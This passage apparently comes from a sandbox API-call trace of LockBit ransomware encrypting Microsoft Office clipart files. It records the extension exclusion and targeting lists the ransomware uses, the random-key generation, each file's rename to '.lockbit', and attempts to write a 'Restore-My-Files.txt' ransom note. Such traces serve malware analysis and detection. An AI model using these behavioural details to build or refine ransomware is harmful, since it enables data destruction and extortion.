(lpString1=".icns", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.741] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.741] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.741] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.741] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.741] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.742] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.742] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.742] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.742] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.742] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.742] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01219_.GIF") returned -1 [0179.742] lstrcmpiW (lpString1="ntldr", lpString2="WB01219_.GIF") returned -1 [0179.742] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01219_.GIF") returned -1 [0179.742] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01219_.GIF") returned -1 [0179.742] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01219_.GIF") returned -1 [0179.742] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01219_.GIF") returned -1 [0179.742] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01219_.GIF") returned -1 [0179.742] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.742] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01219_.GIF") returned=".GIF" [0179.742] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.742] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.742] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.742] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.743] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.743] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.743] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.743] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01219_.GIF.lockbit") returned 72 [0179.743] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01219_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01219_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0179.748] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.748] malloc (_Size=0x40068) returned 0x3d70450 [0179.748] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=740) returned 1 [0179.748] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.748] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0179.748] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.749] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0179.749] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.750] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01219_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01219_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.750] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.750] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.752] free (_Block=0x1fa2ed8) [0179.752] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01219_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.752] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.752] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.752] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f000, ftCreationTime.dwHighDateTime=0x1bd4e6c, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4f000, ftLastWriteTime.dwHighDateTime=0x1bd4e6c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01237_.GIF", cAlternateFileName="")) returned 1 [0179.752] lstrcmpiW (lpString1=".", lpString2="WB01237_.GIF") returned -1 [0179.752] lstrcmpiW (lpString1="..", lpString2="WB01237_.GIF") returned -1 [0179.752] PathFindExtensionW (pszPath="WB01237_.GIF") returned=".GIF" [0179.752] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.752] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.752] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.752] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.752] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.752] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.753] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.753] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.753] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.753] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.753] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.753] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.753] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.753] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.753] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.754] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01237_.GIF") returned -1 [0179.754] lstrcmpiW (lpString1="ntldr", lpString2="WB01237_.GIF") returned -1 [0179.754] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01237_.GIF") returned -1 [0179.754] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01237_.GIF") returned -1 [0179.754] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01237_.GIF") returned -1 [0179.754] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01237_.GIF") returned -1 [0179.754] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01237_.GIF") returned -1 [0179.754] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.754] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01237_.GIF") returned=".GIF" [0179.754] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.754] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.754] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.754] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.755] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.755] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.755] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01237_.GIF.lockbit") returned 72 [0179.755] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01237_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01237_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0179.757] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.757] malloc (_Size=0x40068) returned 0x3f70048 [0179.757] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=363) returned 1 [0179.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0179.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0179.758] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.759] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01237_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01237_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.759] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.759] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.760] free (_Block=0x1fa2ed8) [0179.760] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01237_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.760] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.760] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.760] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe368b800, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe368b800, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x167, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01238_.GIF", cAlternateFileName="")) returned 1 [0179.760] lstrcmpiW (lpString1=".", lpString2="WB01238_.GIF") returned -1 [0179.760] lstrcmpiW (lpString1="..", lpString2="WB01238_.GIF") returned -1 [0179.760] PathFindExtensionW (pszPath="WB01238_.GIF") returned=".GIF" [0179.760] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.760] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.760] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.760] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.760] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.760] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.760] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.760] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.760] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.760] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.760] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.760] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.760] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.760] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.761] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.761] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.761] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.761] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.761] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.761] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.761] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01238_.GIF") returned -1 [0179.762] lstrcmpiW (lpString1="ntldr", lpString2="WB01238_.GIF") returned -1 [0179.762] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01238_.GIF") returned -1 [0179.762] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01238_.GIF") returned -1 [0179.762] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01238_.GIF") returned -1 [0179.762] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01238_.GIF") returned -1 [0179.762] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01238_.GIF") returned -1 [0179.762] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01238_.GIF") returned=".GIF" [0179.762] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.762] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.762] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.762] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.762] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.762] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.762] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.762] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.762] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.762] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.763] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.763] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.763] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.763] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.763] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.763] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.763] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01238_.GIF.lockbit") returned 72 [0179.763] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01238_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01238_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.764] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.764] malloc (_Size=0x40068) returned 0x3e70008 [0179.764] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=359) returned 1 [0179.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.765] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0179.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.820] BCryptGenRandom (in: 